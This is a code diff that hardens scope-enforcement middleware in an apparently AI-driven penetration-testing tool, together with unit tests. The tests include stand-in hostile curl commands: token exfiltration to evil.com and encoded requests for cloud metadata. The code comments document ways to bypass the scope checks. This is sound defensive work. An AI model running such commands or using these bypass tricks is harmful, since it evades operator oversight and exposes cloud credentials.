diff --git a/packages/decepticon/decepticon/middleware/_command_targets.py b/packages/decepticon/decepticon/middleware/_command_targets.py index 973c5137..ba45e25b 100644 --- a/packages/decepticon/decepticon/middleware/_command_targets.py +++ b/packages/decepticon/decepticon/middleware/_command_targets.py @@ -30,10 +30,23 @@ import re import shlex from collections.abc import Callable +from urllib.parse import urlsplit _IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b") _CIDR_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}/\d{1,2}\b") -_URL_RE = re.compile(r"\b(?:https?|ftp|file|smb|nfs|ssh|rdp|ldaps?)://([^\s/:]+)", re.IGNORECASE) +# Capture the whole authority (up to the path/query/fragment/whitespace), NOT +# just the leading ``[^\s/:]+`` slice. The old slice stopped at the first ``:`` +# and never crossed ``@``, so ``scheme://in-scope@evil.com/`` yielded the +# in-scope userinfo (or nothing) instead of the real connect host ``evil.com`` +# — a scope-enforcement bypass. ``_host_from_authority`` then RFC-3986-splits +# off userinfo + port and de-brackets IPv6 literals. +_URL_AUTHORITY_RE = re.compile( + r"\b(?:https?|ftp|file|smb|nfs|ssh|rdp|ldaps?)://([^\s/\\?#]+)", re.IGNORECASE +) +# Threshold above which a bare decimal host is treated as a packed IPv4 integer +# (e.g. ``http://2852039166/`` == 169.254.169.254) rather than a port/number. +# 2**24 keeps small integers (ports, counts) from being mangled into IPs. +_PACKED_IPV4_MIN = 1 << 24 _HOSTNAME_AFTER_VERB_RE = re.compile( r"\b(?:curl|wget|httpx|nmap|masscan|rustscan|ssh|scp|sftp|rsync|" r"smbclient|smbmap|crackmapexec|nxc|netexec|nikto|sqlmap|hydra|ffuf|" @@ -47,10 +60,15 @@ ) -# Final labels that mark a token as a local file argument, never a network -# target. No public DNS TLD collides with any of these, so excluding them is -# safe and prevents RoE ENFORCE mode from refusing legitimate commands whose -# option values (``-i key.pem``, ``-oA scan.txt``) look hostname-shaped. +# Final labels that mark a token as a local-file argument, never a network +# target, so RoE ENFORCE mode does not refuse legitimate commands whose option +# values (``-i key.pem``, ``-oA scan.txt``) look hostname-shaped. +# +# SECURITY: an entry here is only safe if it is NOT also a delegated DNS TLD. +# Real TLDs (``.sh`` ``.md`` ``.py`` ``.pl`` ``.pub`` ``.zip`` …) were removed: +# leaving them in silently dropped genuine hosts such as ``evil.zip`` from RoE +# scope enforcement. Over-extracting a spurious target (operator-overridable) +# is safer than dropping a real one. _NON_TARGET_EXTENSIONS: frozenset[str] = frozenset( { "pem", @@ -61,7 +79,6 @@ "der", "p12", "pfx", - "pub", "txt", "log", "json", @@ -76,12 +93,8 @@ "xml", "html", "htm", - "md", "rst", - "sh", - "py", "rb", - "pl", "ps1", "bat", "pcap", @@ -95,7 +108,6 @@ "sqlite", "sqlite3", "gz", - "zip", "tar", "tgz", "7z", @@ -131,19 +143,71 @@ def _is_valid_target(token: str) -> bool: return True +def _canon_host(token: str) -> str: + """Canonicalize a host token so scope matching is encoding-independent. + + De-brackets IPv6 literals, normalizes packed integer/hex IPv4 encodings to + dotted-quad, and compresses valid IP literals to their canonical string. + Hostnames pass through lower-cased. This closes the IMDS/forbidden-dest + bypass where ``http://2852039166/`` or ``http://0xa9fea9fe/`` reach + 169.254.169.254 without matching a dotted-quad deny rule. + """ + raw = token.strip() + bare = raw[1:-1] if raw.startswith("[") and raw.endswith("]") else raw + if not bare: + return raw.lower() + if ":" not in bare and "." not in bare: + try: + as_int = int(bare, 16) if bare.lower().startswith("0x") else int(bare) + except ValueError: + return bare.lower() + if bare.lower().startswith("0x") or as_int >= _PACKED_IPV4_MIN: + try: + return str(ipaddress.ip_address(as_int)) + except ValueError: + return bare.lower() + return bare.lower() + try: + return str(ipaddress.ip_address(bare)) + except ValueError: + return bare.lower() + + +def _host_from_authority(authority: str) -> str | None: + """Return the real connect host from a URL authority, RFC-3986-correctly. + + Drops userinfo (everything through the last ``@``) and the port, and + de-brackets IPv6 literals — so an ``in-scope@evil.com`` decoy can't mask + the true host. Returns None when no host is present. + """ + try: + host = urlsplit("//" + authority).hostname + except ValueError: + return None + return host or None + + def _extract_generic(command: str) -> set[str]: found: set[str] = set() found.update(_IP_RE.findall(command)) for cidr in _CIDR_RE.findall(command): found.add(cidr) - for host in _URL_RE.findall(command): - found.add(host) + for authority in _URL_AUTHORITY_RE.findall(command): + host = _host_from_authority(authority) + if host: + found.add(host) for m in _HOSTNAME_AFTER_VERB_RE.finditer(command): candidate = m.group(1).rstrip(":,;\"'").lstrip("@") if candidate.startswith("http"): continue - found.add(candidate) - return {t for t in found if _is_valid_target(t)} + if ":" in candidate and not _looks_ipv6(candidate): + # A compound option value (e.g. ``--resolve host:port:ip``) is + # captured as one token; split on ``:`` so each piece is validated + # independently instead of emitting a junk ``host:port:ip`` target. + found.update(candidate.split(":")) + else: + found.add(candidate) + return {c for t in found if (c := _canon_host(t)) and _is_valid_target(c)} def _extract_nmap_targets(command: str) -> set[str]: diff --git a/packages/decepticon/tests/unit/middleware/test_command_targets_scope_bypass.py b/packages/decepticon/tests/unit/middleware/test_command_targets_scope_bypass.py new file mode 100644 index 00000000..aff70ddb --- /dev/null +++ b/packages/decepticon/tests/unit/middleware/test_command_targets_scope_bypass.py @@ -0,0 +1,70 @@ +from decepticon.middleware._command_targets import extract_targets + + +def test_userinfo_decoy_yields_real_host_not_in_scope_label(): + targets = extract_targets("curl http://in-scope.acme.com@evil.com/") + assert targets == {"evil.com"} + + +def test_userinfo_with_password_decoy_yields_real_host(): + targets = extract_targets("curl https://api.acme.com:tok@evil.com/exfil") + assert targets == {"evil.com"} + + +def test_decimal_encoded_imds_normalized_to_dotted_quad(): + targets = extract_targets("curl http://2852039166/latest/meta-data/") + assert "169.254.169.254" in targets + + +def test_hex_encoded_imds_normalized_to_dotted_quad(): + targets = extract_targets("curl http://0xa9fea9fe/latest/meta-data/") + assert "169.254.169.254" in targets + + +def test_ipv6_literal_url_host_extracted(): + targets = extract_targets("curl http://[fd00:ec2::254]/latest/meta-data/") + assert "fd00:ec2::254" in targets + + +def test_compound_resolve_argument_does_not_emit_junk_token(): + targets = extract_targets( + "curl --resolve metadata.google.internal:80:169.254.169.254 " + "http://metadata.google.internal/" + ) + assert "169.254.169.254" in targets + assert "metadata.google.internal" in targets + assert "metadata.google.internal:80:169.254.169.254" not in targets + + +def test_small_integer_host_not_mangled_into_ip(): + assert "0.0.31.144" not in extract_targets("curl http://8080/") + + +def test_plain_url_host_unchanged_regression(): + assert extract_targets("curl http://prod.acme.com/path") == {"prod.acme.com"} + + +def test_url_with_port_strips_port_regression(): + assert extract_targets("curl https://prod.acme.com:8443/") == {"prod.acme.com"} + + +def test_plain_ipv4_target_still_extracted_regression(): + assert "10.0.0.5" in extract_targets("nmap -sV 10.0.0.5") + + +def test_cidr_target_preserved_regression(): + assert "10.0.0.0/24" in extract_targets("nmap -sn 10.0.0.0/24") + + +def test_tld_colliding_hosts_not_dropped_by_extension_denylist(): + assert extract_targets("curl https://evil.zip/") == {"evil.zip"} + assert extract_targets("curl https://target.sh/") == {"target.sh"} + assert extract_targets("curl https://pay.md/") == {"pay.md"} + assert extract_targets("curl https://exploit.py/") == {"exploit.py"} + assert extract_targets("curl https://domain.pl/") == {"domain.pl"} + assert extract_targets("curl https://docs.pub/") == {"docs.pub"} + + +def test_genuine_local_file_argument_still_excluded(): + assert extract_targets("nmap -oA key.pem 10.0.0.1") == {"10.0.0.1"} + assert extract_targets("nmap -oA scan.txt 10.0.0.1") == {"10.0.0.1"}